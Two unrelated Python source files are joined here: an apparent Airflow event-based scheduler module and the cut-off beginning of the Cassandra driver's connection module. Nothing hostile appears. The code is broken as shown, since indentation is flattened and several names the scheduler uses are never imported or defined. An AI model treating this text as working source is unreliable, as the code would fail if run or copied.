from airflow.exceptions import SerializedDagNotFound, AirflowException
from airflow.models.dagcode import DagCode
from airflow.models.event_progress import get_event_progress, create_or_update_progress
from airflow.models.message import IdentifiedMessage, MessageState
from sqlalchemy import func, not_, or_, asc, case
from sqlalchemy.orm import selectinload
from sqlalchemy.orm.session import Session
from airflow import models, settings
from airflow.configuration import conf
from airflow.executors.base_executor import BaseExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DagModel, BaseOperator
from airflow.models.dag import DagEventDependencies, DAG
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.eventhandler import EventKey
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import TaskInstanceKey
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
from airflow.utils.mailbox import Mailbox
from airflow.events.scheduler_events import (
StopSchedulerEvent, TaskSchedulingEvent, DagExecutableEvent, TaskStateChangedEvent, EventHandleEvent, RequestEvent,
ResponseEvent, StopDagEvent, ParseDagRequestEvent, ParseDagResponseEvent, SchedulerInnerEventUtil,
BaseUserDefineMessage, UserDefineMessageType, SCHEDULER_NAMESPACE, DagRunFinishedEvent, PeriodicEvent,
DagRunCreatedEvent)
from notification_service.base_notification import BaseEvent
from notification_service.client import EventWatcher, NotificationClient
from airflow.contrib.jobs.dag_trigger import DagTrigger
from airflow.contrib.jobs.dagrun_event_manager import DagRunEventManager, DagRunId
from airflow.executors.scheduling_action import SchedulingAction
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
MSG = models.Message
class EventBasedScheduler(LoggingMixin):
def __init__(self, id,
mailbox: Mailbox,
task_event_manager: DagRunEventManager,
executor: BaseExecutor,
notification_client: NotificationClient,
notification_server_uri: str,
context=None,
periodic_manager: PeriodicManager = None):
super().__init__(context)
self.id = id
self.mailbox = mailbox
self.task_event_manager: DagRunEventManager = task_event_manager
self.executor = executor
self.notification_client = notification_client
self.dagbag = DagBag(read_dags_from_db=True)
self._timer_handler = None
self.timers = sched.scheduler()
self.periodic_manager = periodic_manager
self.notification_server_uri = notification_server_uri
def sync(self):
def call_regular_interval(
delay: float,
action: Callable,
arguments=(),
kwargs={},
): # pylint: disable=dangerous-default-value
def repeat(*args, **kwargs):
action(*args, **kwargs)
# This is not perfect. If we want a timer every 60s, but action
# takes 10s to run, this will run it every 70s.
# Good enough for now
self._timer_handler = self.timers.enter(delay, 1, repeat, args, kwargs)
self._timer_handler = self.timers.enter(delay, 1, repeat, arguments, kwargs)
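# Note (added for clarity): the enter() call inside repeat() re-registers the
# callback after every run, which is what makes the action periodic; the
# enter() directly above only schedules the first invocation after `delay`
# seconds.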
call_regular_interval(
delay=conf.getfloat('scheduler', 'scheduler_heartbeat_sec', fallback='5.0'),
action=self.executor.sync
)
self.timers.run()
def stop_timer(self):
if self.timers and self._timer_handler:
self.timers.cancel(self._timer_handler)
def submit_sync_thread(self):
threading.Thread(target=self.sync).start()
def schedule(self) -> bool:
identified_message = self.mailbox.get_identified_message()
if not identified_message:
return True
origin_event = identified_message.deserialize()
self.log.debug("Event: {}".format(origin_event))
if SchedulerInnerEventUtil.is_inner_event(origin_event):
event = SchedulerInnerEventUtil.to_inner_event(origin_event)
else:
event = origin_event
with create_session() as session:
if isinstance(event, BaseEvent):
dagruns = self._find_dagruns_by_event(event, session)
for dagrun in dagruns:
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, event)
elif isinstance(event, RequestEvent):
self._process_request_event(event)
elif isinstance(event, TaskSchedulingEvent):
self._schedule_task(event)
elif isinstance(event, TaskStateChangedEvent):
dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
if dagrun is not None:
self._handle_task_status_changed(dagrun, event, session)
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, origin_event)
tasks = self._find_downstream_tasks(event.task_id, dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
if dagrun.state in State.finished:
self.mailbox.send_message(DagRunFinishedEvent(dagrun.dag_id, dagrun.execution_date).to_event())
else:
self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(event.dag_id,
event.execution_date))
elif isinstance(event, DagRunCreatedEvent):
dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
if dagrun is not None:
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
else:
self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(
event.dag_id, event.execution_date))
elif isinstance(event, DagExecutableEvent):
if DagModel.dag_needing_dagruns(session, event.dag_id):
dagrun = self._create_dag_run(event.dag_id, session=session)
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
elif isinstance(event, EventHandleEvent):
dag_runs = DagRun.find(dag_id=event.dag_id, run_id=event.dag_run_id)
if len(dag_runs) < 1:
self.log.warning("DagRun not found by dag_id:{}, run_id:{}".format(
event.dag_id, event.dag_run_id))
else:
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, event.action)
elif isinstance(event, StopDagEvent):
self._stop_dag(event.dag_id, session)
elif isinstance(event, DagRunFinishedEvent):
self._stop_scheduling_periodic_tasks(event.dag_id, event.execution_date)
elif isinstance(event, PeriodicEvent):
dag_runs = DagRun.find(dag_id=event.dag_id, execution_date=event.execution_date)
if len(dag_runs) < 1:
self.log.warning("DagRun not found by dag_id:{}, execution_date:{}".format(
event.dag_id, event.execution_date))
else:
dag_run = dag_runs[0]
if dag_run.get_state() == State.RUNNING:
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, SchedulingAction.RESTART)
else:
self.periodic_manager.remove_task(dag_id=event.dag_id,
execution_date=event.execution_date,
task_id=event.task_id)
self.log.info("Dag run's state is not running(dag_id:{} execution_date: {}), "
"so stop periodic scheduling task(id: {})".format(event.dag_id,
str(event.execution_date),
event.task_id))
elif isinstance(event, StopSchedulerEvent):
self.log.info("{} {}".format(self.id, event.job_id))
if self.id == event.job_id or 0 == event.job_id:
self.log.info("break the scheduler event loop.")
identified_message.remove_handled_message()
session.expunge_all()
return False
elif isinstance(event, ParseDagRequestEvent) or isinstance(event, ParseDagResponseEvent):
pass
elif isinstance(event, ResponseEvent):
pass
else:
self.log.error("can not handler the event {}".format(event))
identified_message.remove_handled_message()
session.expunge_all()
return True
def _handle_task_status_changed(self, dagrun: DagRun, event: TaskStateChangedEvent, session):
ti = dagrun.get_task_instance(task_id=event.task_id)
if event.try_number == ti.try_number:
if State.UP_FOR_RETRY == event.state:
dag = self.dagbag.get_dag(dagrun.dag_id, session=session)
ti.task = dag.get_task(ti.task_id)
next_retry_datetime = ti.next_retry_datetime()
self.mailbox.send_message(message=TaskSchedulingEvent(dag_id=event.dag_id,
task_id=event.task_id,
execution_date=event.execution_date,
try_number=event.try_number,
action=SchedulingAction.START).to_event(),
queue_time=next_retry_datetime)
ti.update_latest_task_execution(session=session)
def stop(self) -> None:
self.mailbox.send_message(StopSchedulerEvent(self.id).to_event())
self.log.info("Send stop event to the scheduler.")
def recover(self, last_scheduling_id):
lost_dag_codes = DagCode.recover_lost_dag_code()
self.log.info("Found %s dags not exists in DAG folder, recovered from DB. Dags' path: %s",
len(lost_dag_codes), lost_dag_codes)
self.log.info("Waiting for executor recovery...")
self.executor.recover_state()
unprocessed_messages = self.get_unprocessed_message(last_scheduling_id)
self.log.info("Recovering %s messages of last scheduler job with id: %s",
len(unprocessed_messages), last_scheduling_id)
for msg in unprocessed_messages:
self.mailbox.send_message(msg.deserialize(), msg.queue_time)
@staticmethod
def get_unprocessed_message(last_scheduling_id: int) -> List[IdentifiedMessage]:
with create_session() as session:
results: List[MSG] = session.query(MSG).filter(
MSG.scheduling_job_id == last_scheduling_id,
MSG.state == MessageState.QUEUED
).order_by(asc(MSG.id)).all()
unprocessed: List[IdentifiedMessage] = []
for msg in results:
unprocessed.append(IdentifiedMessage(msg.data, msg.id, msg.queue_time))
return unprocessed
def _find_dagrun(self, dag_id, execution_date, session) -> DagRun:
dagrun = session.query(DagRun).filter(
DagRun.dag_id == dag_id,
DagRun.execution_date == execution_date
).first()
return dagrun
def _register_periodic_events(self, execution_date, dag, session=None):
self.periodic_manager.store.set_session(session)
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('register periodic task {} {} {}'.format(dag.dag_id, execution_date, task.task_id))
self.periodic_manager.add_task(dag_id=dag.dag_id,
execution_date=execution_date,
task_id=task.task_id,
periodic_config=task.executor_config['periodic_config'])
self.periodic_manager.store.unset_session()
@provide_session
def _stop_scheduling_periodic_tasks(self, dag_id, execution_date, session=None):
dagruns = DagRun.find(dag_id=dag_id, execution_date=execution_date)
if not dagruns:
self.log.warning(f'Found no dagruns to remove periodic events for dag_id: {dag_id} '
f'and execution_date: {execution_date}.')
else:
dag = self.dagbag.get_dag(dag_id=dagruns[0].dag_id, session=session)
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('remove periodic task {} {} {}'.format(dag_id, execution_date, task.task_id))
self.periodic_manager.remove_task(dag_id, execution_date, task.task_id)
def _create_dag_run(self, dag_id, session, run_type=DagRunType.SCHEDULED, context=None) -> DagRun:
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
try:
dag = self.dagbag.get_dag(dag_id, session=session)
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
if dag_model is None:
return None
next_dagrun = dag_model.next_dagrun
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
external_trigger = False
# register periodic task
if run_type == DagRunType.MANUAL:
next_dagrun = timezone.utcnow()
external_trigger = True
# Explicitly check if the DagRun already exists. This is an edge case
# where a Dag Run is created but `DagModel.next_dagrun` and `DagModel.next_dagrun_create_after`
# are not updated.
active_dagrun = session.query(DagRun) \
.filter(DagRun.dag_id == dag_model.dag_id,
DagRun.execution_date == dag_model.next_dagrun).first()
if active_dagrun is not None:
self.log.info("Dagrun already created, %s", active_dagrun)
return active_dagrun
dag_run = dag.create_dagrun(
run_type=run_type,
execution_date=next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=external_trigger,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
context=context
)
if run_type == DagRunType.SCHEDULED:
self._update_dag_next_dagrun(dag_id, session)
self._register_periodic_events(dag_run.execution_date, dag, session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagrun
return dag_run
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_id)
return None
except Exception:
self.log.exception("Error occurred when create dag_run of dag: %s", dag_id)
return None
def _update_dag_next_dagrun(self, dag_id, session):
"""
Update the next_dagrun and next_dagrun_create_after fields of the DagModel for the given dag_id.
"""
active_runs_of_dag = session \
.query(func.count('*')).filter(
DagRun.dag_id == dag_id,
DagRun.state == State.RUNNING,
DagRun.external_trigger.is_(False),
).scalar()
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
dag = self.dagbag.get_dag(dag_id, session=session)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
def _schedule_task(self, scheduling_event: TaskSchedulingEvent):
task_key = TaskInstanceKey(
scheduling_event.dag_id,
scheduling_event.task_id,
scheduling_event.execution_date,
scheduling_event.try_number
)
self.executor.schedule_task(task_key, scheduling_event.action)
def _find_dagruns_by_event(self, event, session) -> Optional[List[DagRun]]:
affect_dag_runs = []
event_key = EventKey(event.key, event.event_type, event.namespace, event.sender)
dag_runs = session \
.query(DagRun).filter(DagRun.state == State.RUNNING).all()
self.log.debug('dag_runs {}'.format(len(dag_runs)))
if dag_runs is None or len(dag_runs) == 0:
return affect_dag_runs
dags = session.query(SerializedDagModel).filter(
SerializedDagModel.dag_id.in_(dag_run.dag_id for dag_run in dag_runs)
).all()
self.log.debug('dags {}'.format(len(dags)))
affect_dags = {}
for dag in dags:
self.log.debug('dag config {}'.format(dag.event_relationships))
self.log.debug('event key {} {} {}'.format(event.key, event.event_type, event.namespace))
dep: DagEventDependencies = DagEventDependencies.from_json(dag.event_relationships)
if dep.is_affect(event_key):
context_extractor: ContextExtractor = dag.context_extractor
try:
event_context: EventContext = context_extractor.extract_context(event)
except Exception as e:
self.log.error(
"Failed to call context extractor, dag {} skips event {}".format(dag.dag_id, event),
exc_info=e)
continue
if event_context is not None:
affect_dags[dag.dag_id] = event_context
if len(affect_dags) == 0:
return affect_dag_runs
for dag_run in dag_runs:
if dag_run.dag_id in affect_dags:
event_context: EventContext = affect_dags[dag_run.dag_id]
if event_context.is_broadcast() or dag_run.context in event_context.get_contexts():
affect_dag_runs.append(dag_run)
return affect_dag_runs
def _find_scheduled_tasks(
self,
dag_run: DagRun,
session: Session,
check_execution_date=False
) -> Optional[List[TI]]:
"""
Make scheduling decisions about an individual dag run
Execution dates of currently active runs are fetched in a single query to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:return: scheduled tasks
"""
if not dag_run or dag_run.get_state() in State.finished:
return
try:
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
return None
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return None
currently_active_runs = session.query(
TI.execution_date,
).filter(
TI.dag_id == dag_run.dag_id,
TI.state.notin_(list(State.finished)),
).distinct().all()
if check_execution_date and dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.warning("Execution date is in future: %s", dag_run.execution_date)
return None
if dag.max_active_runs and not dag.is_long_running_dag():
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.warning(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
dag_run.schedule_tis(schedulable_tis, session)
session.commit()
query = (session.query(TI)
.outerjoin(TI.dag_run)
.filter(DR.run_id == dag_run.run_id)
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model')))
scheduled_tis: List[TI] = with_row_locks(
query,
of=TI,
**skip_locked(session=session),
).all()
return scheduled_tis
def _find_downstream_tasks(self, task_id, dag_run, session) -> Optional[List[TI]]:
tasks = self._find_scheduled_tasks(dag_run, session)
if not tasks or len(tasks) == 0:
return None
dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
downstream_task_ids = dag.task_dict.get(task_id).downstream_task_ids
res = []
for task in tasks:
if task.task_id in downstream_task_ids:
res.append(task)
return res
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_scheduling_task_event(self, ti: Optional[TI], action: SchedulingAction):
if ti is None or action == SchedulingAction.NONE:
return
with create_session() as session:
ti.state = State.QUEUED
session.commit()
task_scheduling_event = TaskSchedulingEvent(
ti.task_id,
ti.dag_id,
ti.execution_date,
ti.try_number,
action
)
self.mailbox.send_message(task_scheduling_event.to_event())
def _send_scheduling_task_events(self, tis: Optional[List[TI]], action: SchedulingAction):
if tis is None:
return
for ti in tis:
self._send_scheduling_task_event(ti, action)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@staticmethod
def _reset_unfinished_task_state(dag_run):
with create_session() as session:
to_be_reset = [s for s in State.unfinished if s not in [State.RUNNING, State.QUEUED]]
tis = dag_run.get_task_instances(to_be_reset, session)
for ti in tis:
ti.state = State.NONE
session.commit()
@provide_session
def restore_unfinished_dag_run(self, session):
dag_runs = DagRun.next_dagruns_to_examine(session, max_number=sys.maxsize).all()
if not dag_runs or len(dag_runs) == 0:
return
for dag_run in dag_runs:
self._reset_unfinished_task_state(dag_run)
tasks = self._find_scheduled_tasks(dag_run, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def _process_request_event(self, event: RequestEvent, session: Session = None):
try:
message = BaseUserDefineMessage()
message.from_json(event.body)
if message.message_type == UserDefineMessageType.RUN_DAG:
# todo make sure dag file is parsed.
dagrun = self._create_dag_run(message.dag_id, session=session, run_type=DagRunType.MANUAL,
context=message.context)
if not dagrun:
self.log.error("Failed to create dag_run.")
# TODO Need to add ret_code and error_msg in ExecutionContext in case of exception
self.notification_client.send_event(ResponseEvent(event.request_id, None).to_event())
return
tasks = self._find_scheduled_tasks(dagrun, session, False)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
elif message.message_type == UserDefineMessageType.STOP_DAG_RUN:
dag_run = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
self._stop_dag_run(dag_run)
self.notification_client.send_event(ResponseEvent(event.request_id, dag_run.run_id).to_event())
elif message.message_type == UserDefineMessageType.EXECUTE_TASK:
dagrun = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
ti: TI = dagrun.get_task_instance(task_id=message.task_id)
self.mailbox.send_message(TaskSchedulingEvent(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=ti.execution_date,
try_number=ti.try_number,
action=SchedulingAction(message.action)
).to_event())
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
except Exception:
self.log.exception("Error occurred when processing request event.")
def _stop_dag(self, dag_id, session: Session):
"""
Stop the dag. Pause the dag and cancel all running dag_runs and task_instances.
"""
DagModel.get_dagmodel(dag_id, session) \
.set_is_paused(is_paused=True, including_subdags=True, session=session)
active_runs = DagRun.find(dag_id=dag_id, state=State.RUNNING)
for dag_run in active_runs:
self._stop_dag_run(dag_run)
def _stop_dag_run(self, dag_run: DagRun):
dag_run.stop_dag_run()
self._stop_scheduling_periodic_tasks(dag_id=dag_run.dag_id, execution_date=dag_run.execution_date)
for ti in dag_run.get_task_instances():
if ti.state in State.unfinished:
self.executor.schedule_task(ti.key, SchedulingAction.STOP)
self.mailbox.send_message(DagRunFinishedEvent(dag_id=dag_run.dag_id,
execution_date=dag_run.execution_date).to_event())
class SchedulerEventWatcher(EventWatcher):
def __init__(self, mailbox):
self.mailbox = mailbox
def process(self, events: List[BaseEvent]):
for e in events:
self.mailbox.send_message(e)
class EventBasedSchedulerJob(BaseJob):
"""
1. todo self heartbeat
"""
__mapper_args__ = {'polymorphic_identity': 'EventBasedSchedulerJob'}
def __init__(self, dag_directory,
notification_server_uri=None,
event_start_time=None,
max_runs=-1,
refresh_dag_dir_interval=conf.getint('scheduler', 'refresh_dag_dir_interval', fallback=1),
*args, **kwargs):
super().__init__(*args, **kwargs)
if notification_server_uri is None:
notification_server_uri = conf.get('scheduler', 'notification_server_uri', fallback='127.0.0.1:50052')
self.log.info("Starting event based scheduler with notification server uri: {}".format(notification_server_uri))
self.mailbox: Mailbox = Mailbox()
self.dag_trigger: DagTrigger = DagTrigger(
dag_directory=dag_directory,
max_runs=max_runs,
dag_ids=None,
pickle_dags=False,
mailbox=self.mailbox,
refresh_dag_dir_interval=refresh_dag_dir_interval,
notification_server_uri=notification_server_uri
)
self.task_event_manager = DagRunEventManager(self.mailbox)
self.executor.set_mailbox(self.mailbox)
self.executor.set_notification_server_uri(notification_server_uri)
self.notification_client: NotificationClient = NotificationClient(server_uri=notification_server_uri,
default_namespace=SCHEDULER_NAMESPACE)
self.periodic_manager = PeriodicManager(self.mailbox)
self.scheduler: EventBasedScheduler = EventBasedScheduler(
self.id,
self.mailbox,
self.task_event_manager,
self.executor,
self.notification_client,
notification_server_uri,
None,
self.periodic_manager
)
self.last_scheduling_id = self._last_scheduler_job_id()
self.need_recover_state = False
self.last_event_version = None
if event_start_time is None:
if self.last_scheduling_id is None:
self.start_time = int(time.time() * 1000)
else:
# need recover the state of the scheduler
self.start_time, self.last_event_version = self._get_progress(self.last_scheduling_id)
self.need_recover_state = True
else:
self.start_time = event_start_time
self.log.info('Progress {} {}'.format(self.start_time, self.last_event_version))
@staticmethod
def _last_scheduler_job_id():
last_run = EventBasedSchedulerJob.most_recent_job()
if not last_run:
return None
else:
return last_run.id
@staticmethod
def _get_progress(scheduling_job_id):
progress = get_event_progress(scheduling_job_id)
if progress is None:
return int(time.time() * 1000), None
else:
return progress.last_event_time, progress.last_event_version
def _execute(self):
# faulthandler.enable()
self.log.info("Starting the scheduler Job")
# DAGs can be pickled for easier remote execution by some executors
# pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
try:
self.mailbox.set_scheduling_job_id(self.id)
self.mailbox.start()
self.scheduler.id = self.id
self.dag_trigger.start()
self.task_event_manager.start()
self.executor.job_id = self.id
self.periodic_manager.start()
self.register_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
execute_start_time = timezone.utcnow()
self.scheduler.submit_sync_thread()
if self.need_recover_state:
self.scheduler.recover(self.last_scheduling_id)
self._set_event_progress()
self._start_listen_events()
self.executor.start()
self._run_scheduler_loop()
self._stop_listen_events()
self.periodic_manager.shutdown()
self.dag_trigger.end()
self.task_event_manager.end()
self.executor.end()
self.mailbox.stop()
settings.Session.remove() # type: ignore
except Exception as e: # pylint: disable=broad-except
self.log.exception("Exception when executing scheduler, %s", e)
finally:
self.log.info("Exited execute loop")
def _run_scheduler_loop(self) -> None:
self.log.info("Starting the scheduler loop.")
self.scheduler.restore_unfinished_dag_run()
should_continue = True
while should_continue:
try:
should_continue = self.scheduler.schedule()
self.heartbeat(only_if_necessary=True)
except Exception as e:
traceback.print_exc()
self.log.error('Scheduler error [%s]', traceback.format_exc())
time.sleep(1)
self.scheduler.stop_timer()
def _set_event_progress(self):
create_or_update_progress(scheduling_job_id=self.id,
last_event_time=self.start_time,
last_event_version=self.last_event_version)
def _start_listen_events(self):
watcher = SchedulerEventWatcher(self.mailbox)
self.notification_client.start_listen_events(
watcher=watcher,
start_time=self.start_time,
version=self.last_event_version
)
def _stop_listen_events(self):
self.notification_client.stop_listen_events()
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
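# --- Illustrative sketch (not part of the original module) ---
# A stripped-down model of the mailbox/dispatch pattern used by
# EventBasedScheduler.schedule() above: pull one message per iteration,
# dispatch on its type, and return False only for a stop event so the
# caller's while-loop (see _run_scheduler_loop) can exit. The classes and
# queue below are stand-ins, not the real Mailbox or event types.
if __name__ == '__main__':
    from queue import Queue

    class _StopEvent:
        pass

    class _DagExecutableEvent:
        def __init__(self, dag_id):
            self.dag_id = dag_id

    def _schedule_once(mailbox):
        event = mailbox.get()
        if isinstance(event, _StopEvent):
            return False  # break the scheduler loop
        if isinstance(event, _DagExecutableEvent):
            print('would create a dag run for', event.dag_id)
        return True  # keep looping

    mailbox = Queue()
    mailbox.put(_DagExecutableEvent('example_dag'))
    mailbox.put(_StopEvent())
    while _schedule_once(mailbox):
        pass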
|
connection.py
|
# Copyright DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import # to enable import io from stdlib
from collections import defaultdict, deque
import errno
from functools import wraps, partial
from heapq import heappush, heappop
import io
import logging
import six
from six.moves import range
import socket
import struct
import sys
from threading import Thread, Event, RLock
import time
try:
import ssl
except ImportError:
ssl = None # NOQA
if 'gevent.monkey' in sys.modules:
from gevent.queue import Queue, Empty
else:
from six.moves.queue import Queue, Empty # noqa
from cassandra import ConsistencyLevel, AuthenticationFailed, OperationTimedOut, ProtocolVersion
from cassandra.marshal import int32_pack
from cassandra.protocol import (ReadyMessage, AuthenticateMessage, OptionsMessage,
StartupMessage, ErrorMessage, CredentialsMessage,
QueryMessage, ResultMessage, ProtocolHandler,
InvalidRequestException, SupportedMessage,
AuthResponseMessage, AuthChallengeMessage,
AuthSuccessMessage, ProtocolException,
RegisterMessage)
from cassandra.util import OrderedDict
log = logging.getLogger(__name__)
# We use an ordered dictionary and specifically add lz4 before
# snappy so that lz4 will be preferred. Changing the order of this
# will change the compression preferences for the driver.
locally_supported_compressions = OrderedDict()
try:
import lz4
except ImportError:
pass
else:
# The compress and decompress functions we need were moved from the lz4 to
# the lz4.block namespace, so we try both here.
try:
from lz4 import block as lz4_block
except ImportError:
lz4_block = lz4
# Cassandra writes the uncompressed message length in big endian order,
# but the lz4 lib requires little endian order, so we wrap these
# functions to handle that
def lz4_compress(byts):
# write length in big-endian instead of little-endian
return int32_pack(len(byts)) + lz4_block.compress(byts)[4:]
def lz4_decompress(byts):
# flip from big-endian to little-endian
return lz4_block.decompress(byts[3::-1] + byts[4:])
locally_supported_compressions['lz4'] = (lz4_compress, lz4_decompress)
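# --- Illustrative note (not part of the original module) ---
# The wrappers above exist because the native protocol writes the uncompressed
# length as a big-endian int32, while the lz4 block format stores it
# little-endian; lz4_decompress() simply reverses the first four bytes, e.g.:
#
#     struct.pack('>i', 5)        # b'\x00\x00\x00\x05' as sent by Cassandra
#     b'\x00\x00\x00\x05'[3::-1]  # b'\x05\x00\x00\x00', what lz4.block expects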
try:
import snappy
except ImportError:
pass
else:
# work around apparently buggy snappy decompress
def decompress(byts):
if byts == '\x00':
return ''
return snappy.decompress(byts)
locally_supported_compressions['snappy'] = (snappy.compress, decompress)
PROTOCOL_VERSION_MASK = 0x7f
HEADER_DIRECTION_FROM_CLIENT = 0x00
HEADER_DIRECTION_TO_CLIENT = 0x80
HEADER_DIRECTION_MASK = 0x80
frame_header_v1_v2 = struct.Struct('>BbBi')
frame_header_v3 = struct.Struct('>BhBi')
class _Frame(object):
def __init__(self, version, flags, stream, opcode, body_offset, end_pos):
self.version = version
self.flags = flags
self.stream = stream
self.opcode = opcode
self.body_offset = body_offset
self.end_pos = end_pos
def __eq__(self, other): # facilitates testing
if isinstance(other, _Frame):
return (self.version == other.version and
self.flags == other.flags and
self.stream == other.stream and
self.opcode == other.opcode and
self.body_offset == other.body_offset and
self.end_pos == other.end_pos)
return NotImplemented
def __str__(self):
return "ver({0}); flags({1:04b}); stream({2}); op({3}); offset({4}); len({5})".format(self.version, self.flags, self.stream, self.opcode, self.body_offset, self.end_pos - self.body_offset)
NONBLOCKING = (errno.EAGAIN, errno.EWOULDBLOCK)
class ConnectionException(Exception):
"""
An unrecoverable error was hit when attempting to use a connection,
or the connection was already closed or defunct.
"""
def __init__(self, message, host=None):
Exception.__init__(self, message)
self.host = host
class ConnectionShutdown(ConnectionException):
"""
Raised when a connection has been marked as defunct or has been closed.
"""
pass
class ProtocolVersionUnsupported(ConnectionException):
"""
Server rejected startup message due to unsupported protocol version
"""
def __init__(self, host, startup_version):
